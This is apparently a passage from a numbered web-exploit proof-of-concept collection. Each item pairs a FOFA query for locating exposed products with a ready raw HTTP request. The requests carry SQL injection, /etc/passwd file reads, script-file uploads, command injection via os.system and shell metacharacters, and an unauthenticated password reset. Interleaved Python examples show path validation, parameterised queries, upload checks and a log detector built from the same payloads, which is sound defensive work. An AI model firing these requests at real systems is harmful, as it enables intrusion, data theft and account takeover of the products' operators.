GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query: the appid value closes the statement and runs select unhex('...') into outfile '.\\..\\..\\WebRoot\\plom.xgi'. The hex string decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); so the written file prints the MD5 of "1" (c4ca4238a0b923820dcc509a6f75849b) and deletes itself.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

SQLite heavy-query time-based payload in req_id: RANDOMBLOB(250000000) makes the response noticeably slower when the condition is evaluated.

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

MySQL time-based variant of entry 158 (same CVE): the %5c escapes the quote that the application adds, and SLEEP(5) delays the response.

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

MSSQL time-based via documentUniqueId. The handler is a delete operation, so use an id that does not match a real study when testing.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

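Items 188 and 190 are the same defect seen twice: a client-supplied value (`/etc/passwd`, `file:///etc/passwd`) is handed to a file opener without being confined to the attachment directory. The check below is an added example written for this post, not code from either product; the storage root `/var/app/attachments` and the function names are assumptions for the demo. It rejects URL schemes, absolute paths and parent traversal, then confirms the normalised path is still below the root.

```python
import posixpath
from urllib.parse import urlparse

# Constructed storage root for this example; the affected products keep their files elsewhere.
ATTACHMENT_ROOT = "/var/app/attachments"


class UnsafePath(ValueError):
    """Raised when a client-supplied name would read outside the attachment root."""


def resolve_attachment(user_value, root=ATTACHMENT_ROOT):
    """Map a client-supplied file name (already URL-decoded by the framework) onto a path under root.

    Rejects the shapes seen in items 188 and 190: absolute paths (/etc/passwd),
    URL schemes (file:///etc/passwd) and parent traversal (../../etc/passwd).
    """
    if not user_value or "\x00" in user_value:
        raise UnsafePath("empty name or NUL byte")
    # Any scheme (file:, php:, http:) means the value targets a URL opener, not a file name.
    if urlparse(user_value).scheme:
        raise UnsafePath("URL scheme not allowed")
    normalised = user_value.replace("\\", "/")
    if normalised.startswith("/"):
        raise UnsafePath("absolute path not allowed")
    root = root.rstrip("/")
    full = posixpath.normpath(posixpath.join(root, normalised))
    # Containment check after normalisation: the result must stay strictly below root.
    # This is a lexical check; resolve symlinks (os.path.realpath) at open time as well.
    if not full.startswith(root + "/"):
        raise UnsafePath("path escapes attachment root")
    return full


def classify(values, root=ATTACHMENT_ROOT):
    """Run a batch of names through resolve_attachment and report the outcome for each."""
    report = {}
    for value in values:
        try:
            report[value] = resolve_attachment(value, root)
        except UnsafePath as exc:
            report[value] = "REJECTED: %s" % exc
    return report


if __name__ == "__main__":
    # The two payloads from items 188 and 190, a traversal variant, and a benign name.
    for name, outcome in classify(["/etc/passwd", "file:///etc/passwd",
                                   "../../../etc/passwd", "2024/minutes.pdf"]).items():
        print("%-24s -> %s" % (name, outcome))
```

A name containing a colon is refused as a scheme, which is a deliberate trade-off: the attachment store names its own files, so a client-supplied colon has no legitimate use here.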
191. 亿赛通 (ESAFENET) Electronic Document Security Management System NavigationAjax SQL injection (MSSQL time-based)
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name query parameter supplies the stored extension, so .ashx turns the body into an ASP.NET handler.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Fetch a CSRF token bound to a fixed PHPSESSID:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Submit the token; the param value is a Python expression that the server executes:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read back the file written in step 2:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

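Items 187, 189, 191, 197, 200 and 201 all rely on the same server-side mistake: the request value is spliced into the SQL text, so a closing quote plus `UNION ALL SELECT 111*111--` (item 197) or `';WAITFOR DELAY '0:0:5'--` (items 189, 191, 201) becomes part of the statement. The example below is added here and is not code from any of these products; the `quote_goods` table, its rows and the function names are constructed for the demo, and SQLite stands in for the real database engines. It runs the item 197 payload through a concatenated query and through a parameterised one.

```python
import sqlite3

# Payload from item 197, URL-decoded: closes the string, appends a UNION and comments out the rest.
PAYLOAD_197 = "1') UNION ALL SELECT 111*111--"


def make_db():
    """In-memory stand-in for the quotation table; rows are constructed for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE quote_goods (goonum TEXT NOT NULL, qty INTEGER NOT NULL)")
    con.executemany("INSERT INTO quote_goods VALUES (?, ?)", [("G-1001", 3), ("G-1002", 7)])
    return con


def goonum_exists_vulnerable(con, goonum_str):
    """String concatenation: the client controls the SQL text, so 111*111 comes back as a row."""
    sql = "SELECT goonum FROM quote_goods WHERE goonum IN ('%s')" % goonum_str
    return [row[0] for row in con.execute(sql)]


def goonum_exists_safe(con, goonum_str):
    """Parameter binding: each value gets its own placeholder and is compared as data, never parsed as SQL.

    A time-based payload such as 1';WAITFOR DELAY '0:0:5'-- is handled the same way: it is bound as a
    literal that matches nothing, so there is no delay and no second statement to execute.
    """
    values = [v.strip() for v in goonum_str.split(",") if v.strip()]
    if not values:
        return []
    placeholders = ",".join("?" * len(values))
    sql = "SELECT goonum FROM quote_goods WHERE goonum IN (%s)" % placeholders
    return [row[0] for row in con.execute(sql, values)]


if __name__ == "__main__":
    con = make_db()
    print("concatenated, payload :", goonum_exists_vulnerable(con, PAYLOAD_197))
    print("parameterised, payload:", goonum_exists_safe(con, PAYLOAD_197))
    print("parameterised, normal :", goonum_exists_safe(con, "G-1001, G-1002"))
```

The placeholder count is derived from the number of values, never from the input text itself, which is the only way to bind a variable-length IN list without reopening the injection.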
198. aliyundrive-webdav (阿里云盘 WebDAV) LuCI command injection
CVE-2024-29640
The sid parameter URL-decodes to `ls />/www/aaa.txt` wrapped in backticks; the request carries a valid sysauth cookie.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

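Items 193, 195 and 198 are three variants of executing client input: a Python expression passed to an evaluator (item 193), a JSON field pasted into a shell line (item 195), and a session id with shell metacharacters (item 198). The handlers below are an added example written for this post, not code from any of the products; the operation names, script path and sid format are assumptions for the demo. Each vulnerable shape is shown beside the fix that removes the shell or evaluator from the path entirely.

```python
import re
import subprocess
from datetime import datetime

# Constructed allow-list: the client picks a key; the argv it maps to is fixed server-side.
ALLOWED_OPS = {
    "restart_dns": ["/sbin/service", "dnsmasq", "restart"],
    "reboot": ["/sbin/reboot"],
}
SID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")  # an opaque token: no spaces, slashes or backticks


def shell_line_vulnerable(op_name):
    """Item 195 shape: the JSON 'name' is pasted into a shell string, so ';uname -a;echo ' becomes three commands."""
    return "/usr/sbin/do_operation.sh %s" % op_name


def shell_command_count(line):
    """Count the simple commands a POSIX shell would run for line (split on ; & | and newline)."""
    return len([part for part in re.split(r"[;&|\n]", line) if part.strip()])


def argv_safe(op_name):
    """Item 195 fix: look the name up in the allow-list; the client never supplies command text."""
    if op_name not in ALLOWED_OPS:
        raise ValueError("unknown operation: %r" % op_name)
    return list(ALLOWED_OPS[op_name])


def run_op(op_name, runner=subprocess.run):
    """Execute an allowed operation as an argv list with no shell in between."""
    return runner(argv_safe(op_name), shell=False, check=False, capture_output=True)


def validate_sid(sid):
    """Item 198 fix: reject anything that is not a plain token before the value reaches any command."""
    if not SID_RE.fullmatch(sid):
        raise ValueError("invalid sid")
    return sid


def parse_system_time(param):
    """Item 193 fix: the value is a timestamp and is parsed as one; it is never handed to eval()."""
    return datetime.strptime(param, "%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    injected = shell_line_vulnerable(";uname -a;echo ")
    print("vulnerable line runs %d commands: %r" % (shell_command_count(injected), injected))
    print("safe argv:", run_op("restart_dns", runner=lambda argv, **kw: argv))
    for bad in (";uname -a;echo ",):
        try:
            argv_safe(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

`run_op` takes the runner as a parameter so the allow-list can be exercised without touching the system; in production the default `subprocess.run` is used as-is.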
199. Cockpit CMS assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Request the login page to obtain the CSRF token (the JSON field is spelled csfr):
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Log in with that token to obtain a session cookie (this POC uses admin/admin):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with the session cookie, then request it:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection (MySQL time-based)
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection (MSSQL time-based)
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
1. Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
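The upload items in this section (192, 194, 199, 202, 203) get through on one of three gaps: the extension comes from the client (`name=.ashx`, `hello.jsp`, `tttt.php`), the file name is used as a path (`../../../../../jboss/web/fe.war/hello.jsp`), or the declared Content-Type is trusted (`image/jpeg` on a JSP). The validator below is an added example written for this post, not code from any of the products; the upload root, the allow-list and the function names are assumptions for the demo. It keeps only the base name, checks every suffix against a script-extension deny-list and an allow-list, verifies magic bytes for binary types, and lets the server pick the stored name.

```python
import posixpath
import secrets

# Constructed upload root; it must sit outside the web root and be served without script execution.
UPLOAD_ROOT = "/var/app/uploads"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".pdf", ".txt"}
# Server-side script extensions used by the section's payloads (.ashx, .jsp, .php) plus common variants.
SCRIPT_EXT = {".jsp", ".jspx", ".jspf", ".php", ".phtml", ".php5", ".ashx", ".asmx",
              ".aspx", ".asp", ".cer", ".cfm", ".cfml"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".pdf": (b"%PDF-",),
}
SCRIPT_TAGS = (b"<%", b"<?php", b"<?=", b"<script", b"<cfscript")


class UploadRejected(ValueError):
    """Raised with the reason an upload was refused."""


def check_upload(filename, data):
    """Decide whether a multipart part may be stored; returns the server-chosen on-disk path."""
    # 1. Only the last path component counts: item 194 sends ../../../../../jboss/web/fe.war/hello.jsp.
    base = posixpath.basename(filename.replace("\\", "/")).strip()
    if base in ("", ".", ".."):
        raise UploadRejected("missing file name")
    # 2. Inspect every suffix, not just the last one (shell.jsp.jpg); a bare extension such as
    #    the ".ashx" from item 192 still yields a script suffix here.
    parts = base.lower().split(".")
    suffixes = ["." + p for p in parts[1:]]
    if not suffixes:
        raise UploadRejected("no extension")
    if any(s in SCRIPT_EXT for s in suffixes):
        raise UploadRejected("server-side script extension")
    ext = suffixes[-1]
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not on allow-list")
    # 3. The declared Content-Type is not an input to this decision (item 203 labels a JSP as
    #    image/jpeg): binary types must match their magic bytes, text must carry no script tags.
    if ext in MAGIC:
        if not any(data.startswith(m) for m in MAGIC[ext]):
            raise UploadRejected("content does not match extension")
    elif any(tag in data.lower() for tag in SCRIPT_TAGS):
        raise UploadRejected("script tag inside text upload")
    # 4. The client never chooses the stored name: a random name under the upload root.
    return posixpath.join(UPLOAD_ROOT, secrets.token_hex(16) + ext)


def triage(filename, data):
    """Wrap check_upload into a (status, detail) pair for logging or tests."""
    try:
        return ("stored", check_upload(filename, data))
    except UploadRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # The section's upload parts, followed by a valid PNG (constructed header bytes).
    samples = [
        ("../../../../../jboss/web/fe.war/hello.jsp", b'<% out.println("hello");%>'),
        (".ashx", b'<% @ webhandler language="C#" class="AverageHandler" %>'),
        ("tttt.php", b'<?php echo "tttt";unlink(__FILE__);?>'),
        ("11.jsp", b'<% out.print("hello,eHR");%>'),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, body in samples:
        print("%-44s -> %s %s" % (name, *triage(name, body)))
```

Item 202's `1123.txt` passes this validator, which is correct: the defect there is that an unauthenticated client can write into a web-served directory at all, and that is fixed by authentication and by storing outside the web root, not by content checks.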
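The post opens by saying it is meant for defenders doing risk checks. The scanner below is an added example written for this post, not code from the original article, and turns items 187 to 203 into detection rules over web-server access logs: each rule is a regular expression applied to the URL-decoded, lower-cased request target, tagged "payload" when the exploit is visible in the URL itself and "endpoint" when only the path is visible and the POST body has to be checked elsewhere. The log lines are constructed for the demo using documentation IP ranges; line 5 is a benign download that must not fire.

```python
import re
from urllib.parse import unquote_plus

# One rule per item of this section: (item, required method or None, pattern, tier).
RULES = [
    ("187", "POST", r"/index\.cfm/_api/json/v1/default/\?method=processasyncobject", "endpoint"),
    ("188", None, r"/attachment\?file=(?:/|\.\./|[a-z]+:)", "payload"),
    ("189", None, r"/xds/deletestudy\.php\?.*waitfor\s+delay", "payload"),
    ("190", "POST", r"/admin/userinfo/poihuoqu", "endpoint"),
    ("191", "POST", r"/cdgserver3/.*navigationajax", "endpoint"),
    ("192", "POST", r"/joinfapp/email/uploademailattr\?name=", "endpoint"),
    ("193", "POST", r"/master/ajaxactions/setsystemtimeaction\.php", "endpoint"),
    ("194", "POST", r"/servlet/uploadattachmentservlet", "endpoint"),
    ("195", "POST", r"/send_order\.cgi\?parameter=operation", "endpoint"),
    ("196", "POST", r"/cas/userctl/resetpasswordbysuper", "endpoint"),
    ("197", None, r"/entsoft/quotegask_editaction\.entweb.*union\s+(?:all\s+)?select", "payload"),
    ("198", None, r"/aliyundrive-webdav/query\?sid=.*[`;|$]", "payload"),
    ("199", "POST", r"/assetsmanager/upload", "endpoint"),
    ("200", None, r"/dmplayer/dmku/\?.*sleep\(", "payload"),
    ("201", "POST", r"/newsedit/newsplan/task/binary\.do", "endpoint"),
    ("202", "POST", r"/user/accountedit\.aspx", "endpoint"),
    ("203", "POST", r"/redseaplatform/ptfjk\.mob\?method=upload", "endpoint"),
]
COMPILED = [(item, method, re.compile(pattern), tier) for item, method, pattern, tier in RULES]

# Apache/nginx combined log format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, when, method, target, status, _size = m.groups()
    return {"client": client, "when": when, "method": method, "target": target, "status": int(status)}


def match_rules(method, target):
    """Return (item, tier) for the first rule the decoded target matches, else None."""
    decoded = unquote_plus(target).lower()  # %27 -> ', + -> space, so encoded payloads still match
    for item, want_method, rx, tier in COMPILED:
        if want_method and want_method != method:
            continue
        if rx.search(decoded):
            return item, tier
    return None


def scan(lines):
    """Run every rule over every line; one hit per line, in log order."""
    hits = []
    for number, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        found = match_rules(rec["method"], rec["target"])
        if found:
            item, tier = found
            hits.append({"line": number, "item": item, "tier": tier, "client": rec["client"],
                         "method": rec["method"], "target": rec["target"], "status": rec["status"]})
    return hits


# Constructed sample log (documentation IP ranges); line 5 is a benign attachment download.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:07:41:10 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2024:07:41:12 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [05/Jun/2024:07:42:01 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 55 "-" "curl/8.4.0"',
    '198.51.100.23 - - [05/Jun/2024:07:42:30 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 130 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [05/Jun/2024:07:43:00 +0800] "GET /attachment?file=2024/minutes.pdf HTTP/1.1" 200 44021 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [05/Jun/2024:07:43:05 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [05/Jun/2024:07:43:09 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %(line)d item %(item)s [%(tier)s] %(client)s %(method)s %(target)s" % hit)
```

"endpoint" hits on a GET-only log are at best a lead: a normal user of item 202's AccountEdit.aspx produces the same line, so those rules should be paired with the response size, the status of the follow-up request for the uploaded path, or the request body where the proxy or WAF logs it.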